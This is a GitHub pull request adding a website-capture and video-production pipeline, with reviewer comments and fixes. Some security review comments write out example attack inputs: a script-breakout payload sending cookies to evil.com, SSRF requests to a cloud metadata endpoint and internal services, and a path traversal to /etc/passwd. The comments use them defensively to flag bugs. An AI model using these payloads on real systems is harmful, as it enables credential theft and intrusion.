Skip to content

feat: website capture pipeline + 7-step video production skill#284

Merged
jrusso1020 merged 36 commits intomainfrom
feat/website-capture-design-md
Apr 16, 2026
Merged

feat: website capture pipeline + 7-step video production skill#284
jrusso1020 merged 36 commits intomainfrom
feat/website-capture-design-md

Conversation

@ularkim
Copy link
Copy Markdown

@ularkim ularkim commented Apr 15, 2026

What

Full website-to-video pipeline: npx hyperframes capture <URL> extracts a site's design system, assets, and screenshots, then the /website-to-hyperframes skill guides an AI agent through a 7-step workflow (capture → DESIGN.md → script → storyboard → VO → build → validate) to produce a professional video.

Why

There was no way to go from a URL to a video. Users had to manually screenshot sites, pick colors, find assets, and figure out the creative direction themselves. This automates the entire pipeline — a single prompt like "Create a 25-second product launch video from https://stripe.com" should produce production-quality output.

How

Capture pipeline (packages/cli/src/capture/):

  • Puppeteer-based extraction: design tokens (colors as HEX, fonts, headings, CTAs, sections), visible text, animations catalog, WebGL shaders, Lottie manifests
  • Asset downloading with DOM context enrichment (alt text, nearest heading, section classes, above-fold detection)
  • Scroll-position screenshots (5 viewports at 0/25/50/75/100% scroll) + per-section viewport tiles (up to 24)
  • Optional Gemini 2.5 Flash vision captioning for downloaded images (GEMINI_API_KEY env var)
  • Auto-generates a CLAUDE.md for the captured site so any agent session can pick up the project

Snapshot command (packages/cli/src/commands/snapshot.ts):

  • npx hyperframes snapshot <dir> --at 2.9,10.4,18.7 for visual self-verification
  • Bundles project HTML, serves locally, launches headless Chrome, seeks to timestamps, captures PNG frames
  • Used by Step 7 (validate) so the agent can visually verify its own output

7-step skill workflow (skills/website-to-hyperframes/):

  • Step 1: Capture & understand (write-down-and-forget method for context management)
  • Step 2: Write DESIGN.md (6-section brand reference, ~90 lines)
  • Step 3: Write SCRIPT (narration with 2.5 words/sec pacing)
  • Step 4: Write STORYBOARD (creative north star — concept-first, cinematic, 8-10 elements per beat)
  • Step 5: Generate VO + map timing (ElevenLabs TTS, word-level timestamps)
  • Step 6: Build compositions (static layout first, then animate, asset cross-reference)
  • Step 7: Validate & deliver (lint, validate, snapshot verification, HANDOFF.md)
  • 10 visual techniques reference with copy-pasteable code patterns

GSAP lint rule (packages/core/src/lint/rules/gsap.ts):

  • Extended gsap_css_transform_conflict to detect inline style="transform:..." attributes
  • Indexes all classes on an element (not just the first) for accurate conflict detection

Notable decisions:

  • Storyboard-driven, not DESIGN.md-driven — DESIGN.md is a brand cheat sheet, the storyboard is the creative north star
  • No checklist in the skill — tested across 6 iterations; checklists killed creativity (agents spent context checking boxes instead of building interesting compositions)
  • Gemini captioning is optional and gracefully degrades — Promise.allSettled handles individual failures
  • Captions are optional (only built if user requests) to reduce overhead

Test plan

  • Manual testing: 6 iterations across Stripe and Railway websites with full pipeline execution
  • CLI type-checks clean (tsc --noEmit — pre-existing errors in verify/index.ts only)
  • Lint + format pass (oxlint + oxfmt via lefthook pre-commit)
  • Code review: 16 bugs found and fixed (path traversal, browser leak, div-by-zero, dead code, wrong API config, broken skill references)
  • All skill file cross-references verified (transitions/catalog.md, shader-setup.md, techniques.md, etc.)
  • Unit tests for inline-style GSAP lint detection (identified gap, not yet written)
  • Documentation updated (CLAUDE.md aligned with main, AGENTS.md untouched)

🤖 Generated with Claude Code

ukimsanov and others added 29 commits April 15, 2026 14:04
Adds `hyperframes capture <url>` command that extracts a complete design
system from any website, producing AI-agent-ready output:

- Full-page screenshot (lazy-load aware, nav at top)
- AI-generated DESIGN.md via Claude API (colors, typography, elevation,
  components, do's/don'ts) with programmatic asset catalog (136+ assets
  with HTML context annotations like img[src], css url(), link[rel=preload])
- CSS-purged compositions (87% size reduction via PurgeCSS)
- HTML-prettified compositions (one-tag-per-line for AI readability)
- CLAUDE.md + .cursorrules auto-generated for AI agent instructions
- Asset deduplication (srcset variants) and tracking pixel filtering
…ment

- switch to gemini 3.1 pro (gemini-3.1-pro-preview) with claude fallback
- playwright for full-page screenshots (fixes puppeteer gradient/fixed bugs)
- replica refinement loop: generate, screenshot, compare, fix
- extract inline svgs (50 max, 10kb each) to assets/svgs/
- extract visible text in dom order for content accuracy
- detect js libraries (gsap, three.js, scrolltrigger) via globals
- improved asset catalog grouping and naming
- reverse-engineered aura system prompt documentation
- comprehensive session handoff doc

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- key finding: team already wants DESIGN.md integration (James, Bin, Vance)
- skills quality matters enormously - must invoke /hyperframes-compose
- eval infrastructure exists (Abhay's dashboards, Teodora's 78-criteria guide)
- templates at templates/ need study before finalizing skill
- session handoff updated with critical next steps
Captures Lottie animations via network interception and WebGL shader
source via gl.shaderSource hooking during site crawl. Updates
website-to-hyperframes skill with asset planning guidance, Lottie/shader
reading instructions, and stronger creative direction for scene planning.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Capture pipeline:
- Remove dead deps (puppeteer-extra, stealth plugin, duplicate devDeps)
- Remove duplicate generateAgentPrompt() call (first lied about DESIGN.md)
- Remove dead canvas-to-image code in htmlExtractor (post canvas removal)
- Parallelize image downloads (batches of 5 via Promise.allSettled)
- Fix pre-existing TS error (match[1] guard in font downloader)
- Default capture output to captures/<hostname>

Skill creative overhaul:
- Add shader transition selection to creative director step (Step 4)
- Add shader wiring instructions to engineer step (Step 5)
- Replace 4-line energy modifiers with visual vocabulary table
- Strip rigid scene-by-scene templates from video-recipes.md
- Strip example fill data from scene plan tables
- Add "read transition refs before planning" instruction
- Add creative ambition language ("how the hell did they make this")

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Comprehensive redesign of website-to-hyperframes skill and capture
pipeline based on code review findings and Claude Code architecture
research. Key changes: remove AI auto-generation, restructure skill
into phases, embed shader boilerplate in scaffold, fix color format.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
13-task plan covering: capture pipeline cleanup (remove AI generation,
fix colors to HEX, add asset descriptions, shader-ready scaffold),
skill restructuring (4 phases with artifact gates), and compose skill
Visual Identity Gate upgrade.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Remove orphaned `false` argument in generateAgentPrompt call (critical:
  was shifting hasLottie, hasShaders, catalogedAssets parameters)
- Add HSL color handling in rgbToHex via temp element resolution
- Remove build artifact commit section from phase-4-build.md
- Fix __GSAP_TIMELINE reference to __timelines

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…criptions

- Double-escape regex in tokenExtractor template literal (\s→\\s, \d→\\d, \(→\\()
  so browser receives valid regex patterns via page.evaluate()
- Simplify index.html scaffold: scene slots + audio + timeline + comment pointing
  to shader-setup.md reference (no broken inline shader boilerplate)
- Fix asset descriptions: use CatalogedAsset.contexts/notes instead of
  nonexistent htmlContext field

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Code fixes:
- snapshot.ts: path traversal guard, browser leak (try/finally), div-by-zero
  for --frames 1, port bind error handling, rAF-based render settle
- index.ts: remove invalid thinkingConfig for gemini-2.5-flash, fix Gemini
  batch/rate-limit comments, fix video preview viewport y-coordinate
- tokenExtractor.ts: remove dead seen[si] dedup code
- gsap.ts: index ALL classes for inline-style transform conflict detection

Skill architecture rewrite (4-phase → 7-step):
- Replace phase-1 through phase-4 with step-1 through step-7
- Add techniques.md (10 visual techniques with code patterns)
- Fix /hyperframes-compose → /hyperframes (skill doesn't exist)
- Fix captures/arc-browser reference → shader-setup.md (file doesn't exist)
- Fix step-7 hardcoded captures/stripe path
- Document Gemini API free/paid rate limits in step-1

Cleanup:
- CLAUDE.md: restore from Stripe-capture overwrite, update 4-phase → 7-step
- .gitignore: add PR #267 skills (hyperframes-animation-map, hyperframes-contrast)
- Delete old phase-*.md, animation-recreation.md, tts-integration.md

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Remove files that shouldn't ship in this PR:
- docs/research/ (aura analysis, prompt catalogs)
- docs/session-*.md, docs/SESSION-HANDOFF.md (dev notes)
- docs/superpowers/ planning and spec docs
- pnpm-lock.yaml at root and cli (repo uses bun, not pnpm)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…ames mention

Main PR #283 removed the full skills table from CLAUDE.md and moved it
to AGENTS.md. Align with that decision: use main's slim dev-focused
format, fix pnpm→bun references, add one-line /website-to-hyperframes
pointer.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The capture command was registered in cli.ts but missing from
the help groups, so it wouldn't appear in `hyperframes --help`.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The lockfile was stale after rebasing onto main — bun install
--frozen-lockfile failed in CI because new dependencies (google/genai,
patchright, purgecss) weren't reflected in the lockfile.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@ularkim ularkim requested a review from jrusso1020 April 15, 2026 18:20
>
$1.9T
</div>

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Contradicts step-6-build.md rule. This code example uses left:50%;transform:translateX(-50%) for centering — the exact pattern that step-6-build.md:133 explicitly forbids:

Never use ANY CSS transform for centering — not translate(-50%, -50%), not translateX(-50%). GSAP animates the transform property, which overwrites ALL CSS transforms including centering. The element flies offscreen.

The linter also catches this (gsap_css_transform_conflict), and the new inline-style detection in this same PR would flag it. Fix to flexbox centering:

<div style="position:absolute;top:280px;left:0;width:100%;
  display:flex;justify-content:center;">
  <div id="hero-stat" style="font-size:200px;font-weight:900;color:#fff;opacity:0;">
    $1.9T
  </div>
</div>

Same fix needed for the #label element a few lines below.

if (root) return parseFloat(root.getAttribute("data-duration") ?? "0");
const tls = win.__timelines;
if (tls) {
for (const key in tls) {
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Same duration function bug. This is the same pattern flagged in the other inline review — win.__player.duration may be a GSAP method reference (truthy but not a number), which propagates to the seek positions as NaN. Same fix:

const d = win.__player?.duration;
if (d != null) return typeof d === "function" ? d() : d;

res.end();
return;
}
if (existsSync(filePath)) {
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

POSIX-only path traversal guard — third instance. Same pattern flagged on capture/index.ts and verify/index.ts. projectDir + "/" breaks on Windows where the separator is \. All three should share a single helper:

import { relative, isAbsolute } from "node:path";
function isInsideDir(base: string, target: string): boolean {
  const rel = relative(base, target);
  return !rel.startsWith("..") && !isAbsolute(rel);
}

Comment thread .gitignore Outdated
notion-ai-agents/
stripe-launch/
stripe-investor/
stripe-website/
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

20 hardcoded test capture directories. These are the author's local test artifacts — notion-promo/, stripe-launch/, arc-browser/, lusion-brand/, etc. They'll grow with every test run and don't belong in the repo's gitignore. Replace with a generic pattern:

# Capture outputs
captures/
*-capture/

Or add them to .git/info/exclude if they're local-only.

Comment thread package.json
"purgecss": "^8.0.0"
},
"devDependencies": {
"@commitlint/cli": "^20.5.0",
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Root production dependencies that only the CLI uses. patchright and purgecss are added here but only packages/cli uses them. purgecss is already in packages/cli/package.json. Move patchright to the CLI package and remove both from root — this avoids bloating bun install for anyone working on core, engine, player, etc.

Comment thread packages/cli/package.json
@@ -35,22 +36,21 @@
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hard dependency for optional Gemini captioning. The PR description says "Gemini captioning is optional and gracefully degrades" with Promise.allSettled. But @google/genai is a non-optional dependency here — it gets installed for every user even if they never set GEMINI_API_KEY. Dynamically import with try/catch instead, or move to optionalDependencies.

Comment thread packages/cli/package.json Outdated
"postcss": "^8.5.8",
"puppeteer-core": "^24.39.1"
"prettier": "^3.8.1",
"puppeteer-core": "^24.39.1",
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

CLI now depends on both puppeteer-core AND playwright. screenshotCapture.ts uses Playwright for captureFullPageScreenshot while everything else uses Puppeteer. That's ~200MB+ of extra browser binaries for one function. Either migrate the full-page screenshot to Puppeteer's page.screenshot({ fullPage: true }) (which already works), or move everything to Playwright. Having both is costly for install size and maintenance.

- **Kokoro** (offline last resort — has Python dependency issues on many systems) — `npx hyperframes tts SCRIPT.md --voice af_nova --output narration.wav`. Only try this if ElevenLabs and HeyGen are unavailable.

Pick the voice that sounds most natural and conversational. Listen for pacing — does it breathe between sentences? Does it sound like a person or a robot?

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

TTS ranking contradicts CLAUDE.md and the hyperframes skill. ElevenLabs is listed as "recommended" here, with Kokoro relegated to "offline last resort — has Python dependency issues." But the project's CLAUDE.md documents Kokoro-82M as the primary TTS tool (npx hyperframes tts), and references/tts.md in the hyperframes skill is entirely Kokoro-focused.

An agent following this skill will skip the built-in tool in favor of an external API that requires auth setup. The ranking should either:

  • Put Kokoro first (it's built-in, no API key, no auth)
  • Or explicitly state when to prefer ElevenLabs over Kokoro (e.g., "when voice quality matters more than setup speed")

Also: the note says HeyGen TTS "returns word timestamps automatically" — that's exactly what downstream steps need for beat mapping. If timing is the priority, HeyGen should rank above ElevenLabs, not below it.

Review fixes (16 comments from jrusso1020 + vanceingalls):
- screenshotCapture: remove Playwright dep, use Puppeteer for all screenshots
- screenshotCapture: dynamic screenshot count based on page height (30% overlap)
- snapshot.ts: fix duration() function-vs-property bug, cross-platform path guard
- htmlExtractor: fix code injection via parameterized evaluate
- index.ts: video preview re-measures position after scroll, .env file loading
- capture.ts: BLOCKED.md on timeout failures
- gsap.ts: 5 inline-style lint tests added (all pass)
- Remove Playwright, patchright deps; @google/genai to optionalDependencies
- Gitignore: generic patterns instead of 20 hardcoded directories
- Remove asset-sourcing.md, video-recipes.md (unused, duplicated guidance)

Capture quality improvements (tested on 10+ websites):
- Color extraction: canvas-based oklch/lab resolver, pixel sampling via
  elementFromPoint, broad sweep for accent colors, gradient/shadow extraction
- Section detection: broadened selectors for div-based layouts, height cap
  to skip page-level wrappers, parent bg walkup for dark sites
- Font downloads: cap 6 per family / 30 total (Cal.com: 306→30)
- CTA detection: text pattern matching + nav context filtering
- Heading text: innerText with whitespace normalization
- Gemini captioning: maxOutputTokens 100→300, .env auto-loading
- .env.example updated with GEMINI_API_KEY docs
- TTS ranking: Kokoro first with Python 3.10+ note
@ularkim
Copy link
Copy Markdown
Author

ularkim commented Apr 16, 2026

Review Response

Addressed all 16 comments in commit 6266708. Here's the summary:

Fixed ✅

# Issue Fix
1 Playwright browser leak Removed Playwright entirely — all screenshots now use Puppeteer
2 Video preview stale coords Re-measures position after scroll via getBoundingClientRect(), seeks to 0.1s for decoder
3/10 duration function bug typeof d === "function" ? d() : d check
4/11 Path traversal Windows path.relative + isAbsolute check
5 No inline-style lint tests 5 tests added (translate, scale, rotate no-FP, multi-class, dual style+inline)
7 Duplicated guidance Removed video-recipes.md and asset-sourcing.md (sources of duplication)
8 Code injection htmlExtractor Parameterized page.evaluate(fn, href) instead of string interpolation
9 video-recipes contradiction File removed (the translateX centering example is gone)
12 20 hardcoded gitignore entries Replaced with generic patterns (*-capture/, *-demo/, etc.)
13 Root deps Removed patchright (dead dep — never imported), purgecss already in CLI
14 @google/genai hard dep Moved to optionalDependencies
15 Puppeteer + Playwright Removed Playwright entirely — screenshots use Puppeteer with dynamic viewport tiling
16 TTS ranking Kokoro first (free, built-in) with Python 3.10+ requirement noted and ElevenLabs/HeyGen as fallbacks

Deferred to follow-up PR

# Issue Reason
6 Split index.ts (1126 lines) Significant refactor risk in same PR as 15+ other changes. Will do as immediate follow-up.

Additional improvements in this commit

  • Color extraction: canvas-based oklch/lab resolver, pixel sampling via elementFromPoint, gradient/shadow color extraction
  • Section detection: broadened selectors, height cap for page wrappers, parent bg walkup
  • Font downloads: capped at 6/family, 30 total (Cal.com: 306→30)
  • CTA detection: text pattern matching + nav context filtering
  • Screenshots: dynamic count based on page height (30% overlap), removed section tiling
  • Gemini captioning: .env auto-loading, maxOutputTokens 100→300
  • BLOCKED.md: written on timeout/anti-bot failures

Tested on 10+ websites: Linear, Cal.com, Tailwind CSS, Supabase, Basecamp, Dribbble, Notion, Resend, Midjourney, Dub.co, Shopify, Vercel.

Copy link
Copy Markdown
Collaborator

@vanceingalls vanceingalls left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All 16 review items from both passes have been addressed in 6266708. Nice work.

One fix needed before merge — CI is red:

verify/index.ts:132,137noUncheckedIndexedAccess: true means sections[i] is SectionResult | undefined. Add a guard:

const section = sections[i];
if (!section) continue;

Minor (not blocking): verify/index.ts file server (~line 95) has no path traversal guard — same join(projectDir, url) pattern that was fixed in snapshot.ts. Low risk (localhost, random port, short-lived) but worth matching the fix pattern from snapshot.ts:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }

Everything else looks solid — parameterized evaluate, Playwright removal, optional Gemini dep, TTS ranking, lint tests, gitignore patterns all check out.

Copy link
Copy Markdown
Collaborator

@jrusso1020 jrusso1020 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Staff-Engineer Second Pass Review

The fix commit (6266708) addressed the majority of the first-round feedback well — credit to @ularkim for taking it seriously. Browser leak, code injection, duration bug, path traversal in snapshot.ts, GSAP lint tests, Playwright removal, TTS ranking, and the video-recipes.md duplication source are all resolved. Solid work.

That said, a few items remain open from the first round, and the fix commit introduced one new regression.


Still Open — Must Fix Before Merge

1. verify/index.ts — path traversal (security)
The file server has no path traversal guard. req.url is decoded and join()-ed to projectDir without checking whether the result escapes the directory. This was fixed in snapshot.ts but NOT here — same bug, same pattern. Needs the same relative() + isAbsolute() guard that snapshot.ts now has. Lift it into a shared helper since it's needed in two places.

2. capture/index.ts — still 1,175 lines
The modularity concern was acknowledged but not addressed. The file orchestrates browser launch, WebGL hooks, Lottie interception, animation cataloging, HTML extraction, token extraction, video manifest, text extraction, Gemini captioning, asset descriptions, section splitting, CSS purging, and project scaffolding — in one function. The ═══ comment banners are literally the module boundaries waiting to become files. This is the single biggest maintainability risk in the PR and will make the next bug in this pipeline painful to isolate.

3. package.jsonadm-zip removed but still dynamically imported (regression)
The fix commit removed adm-zip from dependencies, but index.ts still dynamically imports it for .lottie file extraction (const AdmZip = (await import("adm-zip")).default). This will crash at runtime when a captured site has Lottie animations packaged as .lottie files. Either restore the dependency or remove the dead code path.


Should Fix

4. Lottie JSON injection in index.ts
Raw Lottie JSON file content (animJson) is interpolated directly into a <script> tag template literal: animationData:${animJson}. A malicious Lottie file could break out of the JS expression. Low blast radius (headless Chrome, short-lived), but still a code injection vector. Use JSON.stringify() to safely embed it.

5. Step-4 contradiction on technique count
step-4-storyboard.md says "Pick 2-3 per beat" (so 16-24 technique uses for an 8-beat video) but the global guardrails in the same file say "Use at least 2-3 different techniques across the video" (only 2-3 total). These are 10x apart. The per-beat guidance matches the surrounding context — tighten the global guardrail phrasing to match.

6. .env.example removed ANTHROPIC_API_KEY
The old file had ANTHROPIC_API_KEY for "AI-assisted composition via MCP." This PR replaces it with GEMINI_API_KEY. If MCP composition is still a feature (and it is), new contributors won't discover it. Keep both keys listed.

7. Step-6 asset presentation recommends transform: perspective(...) as static CSS
This directly conflicts with the "GSAP overwrites ALL CSS transforms" rule in the same file's Critical Rules section. If an agent applies this tilt AND then animates with GSAP, the tilt vanishes. Should recommend gsap.set() instead for elements that will be animated.

8. step-1-capture.md leads with Gemini API key
The capture works fully without any API key — DOM-context descriptions (alt text, nearest heading, section classes, above-fold) are the zero-config default, and @google/genai is correctly in optionalDependencies. But the skill doc's first paragraph leads with the Gemini key, which can give agents (or users) the impression it's required. Suggest reordering to lead with the zero-config path:

npx hyperframes capture <URL> -o captures/<project-name>

No API keys required. The capture extracts design tokens, screenshots, fonts, and assets with DOM-context descriptions automatically.

Optional: Set GEMINI_API_KEY for richer AI-powered image descriptions via Gemini 2.5 Flash vision.


Nits

  • ~15 silent catch {} blocks in index.ts swallow errors without pushing to warnings[] — users won't know why a capture is incomplete
  • snapshot.ts CLI help uses hardcoded captures/stripecaptures/<project> would be more consistent with skill docs
  • visual-style.md vs visual-styles.md disambiguation exists but is buried in a parenthetical — could be a standalone callout

Verdict

Three items remain blocking: the verify/index.ts path traversal (#1, security), adm-zip runtime crash (#3, regression from the fix commit), and index.ts modularity (#2, maintainability). The first two are quick fixes; #2 is the real question — gate merge or track as immediate follow-up.

Everything else from the first round was resolved well. The overall feature design is strong.

Review round 2 fixes (jrusso1020 + vanceingalls):
- verify/index.ts: add path traversal guard (relative + isAbsolute)
- verify/index.ts: fix sections[i] undefined typecheck error (CI green)
- index.ts: escape Lottie JSON with \u003c to prevent </script> breakout
- step-4-storyboard: fix technique count contradiction (2-3 per beat, not
  across whole video)
- step-6-build: perspective tilt uses gsap.set() instead of CSS transform
  (avoids GSAP overwrite conflict)
- step-1-capture: reorder — command first, Gemini note after (zero-config
  is the default path, API key is optional enhancement)
- step-7-validate: add tsx fallback for snapshot command
- step-3-script: vary hook patterns, don't default to number every time
- assetDownloader: exempt SVGs from 10KB minimum filter (company logos
  like Hubspot/Intel/DHL are 2-6KB; HeyGen capture: 13→75 assets)

Note: adm-zip was NOT removed (reviewer #3) — it's still in
packages/cli/package.json:30. The root package.json had patchright
and purgecss removed, not adm-zip.

Note: ANTHROPIC_API_KEY not restored in .env.example — grep confirms
zero references in the entire codebase. The @anthropic-ai/sdk dependency
was removed earlier in this branch.
Copy link
Copy Markdown
Collaborator

@miguel-heygen miguel-heygen left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Third-pass review — focused on issues not covered by James's or Vance's reviews. All their feedback still stands. The latest commit (6266708) correctly addresses all previously flagged items (verified each fix).

Must fix before merge

  1. SSRF via unrestricted fetch() in asset downloads and CSS fetchingfetchBuffer() and the stylesheet fetch in htmlExtractor.ts follow any URL from the target page, including cloud metadata endpoints (169.254.169.254), internal services, and localhost. Inline on assetDownloader.ts.
  2. JS injection via Lottie JSON interpolated into setContent — raw fetched JSON is template-literal'd directly into a <script> block. A crafted Lottie file can break out of the JS context. Inline on index.ts.
  3. verify/index.ts file server has no path traversal guard — the fix applied to snapshot.ts was not applied here. Inline.

Should fix

  1. Unbounded response body in Lottie interceptionresponse.buffer() downloads the full body before size-checking. Inline on index.ts.
  2. adm-zip used at runtime but missing from dependenciesindex.ts dynamically imports adm-zip to extract dotLottie ZIP files. The try/catch prevents crashes, but dotLottie extraction silently fails. Should be in optionalDependencies (like @google/genai) or a regular dep.
  3. Manual .env parsing is fragile — hand-rolled parser doesn't handle edge cases and modifies process.env as a side effect. Inline on index.ts.

Smaller items (not blocking)

  • Lottie dedup uses jsonData.slice(0, 200) as a "hash" — files with identical headers get falsely deduped
  • maxScreenshots param accepted but unused (underscore-prefixed); cap hardcoded at 20 in screenshotCapture.ts
  • prettier (14MB+) is a regular dep but only used optionally in cssPurger.ts — should be optionalDependencies
  • Duplicate slugify() in assetDownloader.ts and compositionGen.ts
  • CDP session from animationCataloger.ts is disabled but never detached

Verification of fixes from commit 6266708

All 7 previously flagged items verified as correctly fixed:

  • htmlExtractor.ts injection: parameterized page.evaluate
  • screenshotCapture.ts: Playwright removed, Puppeteer only
  • snapshot.ts duration(): typeof d === "function" check
  • snapshot.ts path traversal: relative() + isAbsolute()
  • GSAP lint tests: 5 new tests added
  • .gitignore: generic patterns
  • @google/genai: optionalDependencies

try {
const res = await fetch(url, {
signal: AbortSignal.timeout(10000),
headers: { "User-Agent": "HyperFrames/1.0" },
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

SSRF via unrestricted fetch(). fetchBuffer() follows any URL passed to it — including cloud metadata endpoints, internal services, and localhost. Since the capture pipeline navigates to arbitrary user-provided URLs and then fetches derived URLs (stylesheets, images, Lotties) server-side, a malicious site can embed:

<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/">
<img src="http://internal-service:8080/admin/secrets">

...and this function will fetch them and save the response to disk.

Fix: Add URL validation before fetching. At minimum reject private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x), non-HTTP(S) schemes, and localhost. Apply the same check in the CSS fetch in htmlExtractor.ts and the Lottie download in index.ts.

Comment thread packages/cli/src/capture/index.ts Outdated
`<!DOCTYPE html>
<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lottie-web/5.12.2/lottie.min.js"></script>
<style>*{margin:0;padding:0;background:transparent}#c{width:400px;height:400px}</style>
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

JS injection via Lottie JSON interpolated into setContent. animJson is raw content fetched from the target website, directly interpolated into a <script> block via template literal (animationData:${animJson}). A crafted Lottie JSON with a nm field containing </script><script>fetch('http://evil.com/'+document.cookie)// would escape the script tag and execute arbitrary code in the Puppeteer page context.

Fix: Load the page shell first via setContent (without the data), then pass the animation data via parameterized page.evaluate() — same pattern used for the htmlExtractor fix.

let content = readFileSync(filePath);
let contentType = getMimeType(filePath);

// For composition HTML files: unwrap <template> for standalone rendering
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Path traversal — missing guard. The fix applied to snapshot.ts (using relative() + isAbsolute()) was not applied here. A request to ../../etc/passwd would read arbitrary files. The server only listens on 127.0.0.1 on an ephemeral port, so exploitation requires local access — but the pattern is identical to what was already fixed in snapshot.ts.

Fix: Add the same guard after the join() call:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }


if (isJsonUrl || isJson) {
const buffer = await response.buffer();
if (buffer.length < 100 || buffer.length > 5_000_000) return; // Skip tiny or huge
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Unbounded response body in Lottie interception. response.buffer() downloads the entire response body into memory before the size check on the next line. A site serving a multi-GB response on a .json URL would OOM before the 5MB guard runs.

Fix: Check Content-Length header first when available:

const cl = parseInt(response.headers()['content-length'] || '0', 10);
if (cl > 5_000_000) return;

Comment thread packages/cli/src/capture/index.ts Outdated
};

// Load .env file from repo root if it exists (for GEMINI_API_KEY, etc.)
try {
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Manual .env parsing is fragile. This hand-rolled parser walks up 5 parent directories looking for .env and modifies process.env as a side effect. It doesn't handle multi-line values, comments after values (KEY=val # comment includes the comment), or escaped quotes. Bun has built-in .env support — if the capture command runs via npx hyperframes capture, bun loads .env automatically. If the manual parser is needed for a specific reason (e.g., output dir differs from repo root), worth documenting that.

Mechanical extraction, zero logic changes.

New files:
- mediaCapture.ts (345 lines): Lottie preview, video manifest/screenshots
- contentExtractor.ts (314 lines): library detection, text, Gemini, asset descriptions
- scaffolding.ts (135 lines): .env loading, project scaffold generation

Also fixes false-positive BLOCKED.md with structural Cloudflare detection.
Tested on 20 websites, pre/post output identical.
…gecss)

The --split feature auto-generates compositions from captured HTML — a
different approach from the /website-to-hyperframes skill workflow where
agents build compositions from scratch using the storyboard.

No skill file, no step reference, and no test session ever used --split.
Removes 923 lines of unused code + purgecss dependency.

Backed up to ~/Desktop/capture-split-backup/ for reference.
- assetDownloader: add isPrivateUrl() guard blocking private IP ranges
  (127.x, 10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata
  endpoints, localhost, and non-HTTP schemes
- mediaCapture: fix Lottie JSON injection by loading shell HTML first
  then passing animation data via parameterized page.evaluate()
- index.ts: check Content-Length header before response.buffer() in
  Lottie network interception to avoid OOM on multi-GB responses
Security (from miguel-heygen review):
- assetDownloader: export isPrivateUrl() SSRF guard
- htmlExtractor: add isPrivateUrl check before CSS fetch
- mediaCapture: add isPrivateUrl check before Lottie fetch
- mediaCapture: fix previewPage leak (try/finally)
- mediaCapture: skip Lottie files > 2MB for preview (CDP limit)
- contentExtractor: skip images > 4MB for Gemini captioning
- index.ts: check Content-Length before response.buffer() (OOM guard)
- snapshot.ts: register error handler before server.listen()

Capture improvements:
- Default timeout 30s to 120s (Shopify needs ~90s for Cloudflare)
- step-6-build: sub-agent dispatch template with explicit rules:
  pass file PATHS not contents, use local fonts not Google Fonts,
  verify ../assets/ references after each beat
@ularkim
Copy link
Copy Markdown
Author

ularkim commented Apr 16, 2026

Review Response — Round 3

Five new commits addressing @miguel-heygen's security review + @jrusso1020's modularity concern:

Security fixes (48ec6a0, 44b9cbd)

  • SSRF protection: isPrivateUrl() guard now applied to all 3 fetch sites (assetDownloader, htmlExtractor CSS fetch, mediaCapture Lottie fetch). Blocks private IPs (10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata, localhost.
  • Lottie injection: Parameterized page.evaluate() — animation data passed as function arg, not interpolated into script tag
  • OOM guard: Content-Length check before response.buffer() in Lottie interception
  • Preview page leak: try/finally on Lottie preview rendering
  • File size guards: Skip Lottie > 2MB for preview, skip images > 4MB for Gemini captioning
  • Server error handler: Registered before listen() in snapshot.ts

Modularity (3b2e1cb)

Split capture/index.ts from 1,175 → 566 lines:

  • mediaCapture.ts (345 lines) — Lottie preview, video manifest
  • contentExtractor.ts (314 lines) — library detection, text, Gemini, asset descriptions
  • scaffolding.ts (135 lines) — .env loading, project scaffold

Cleanup (be0f194)

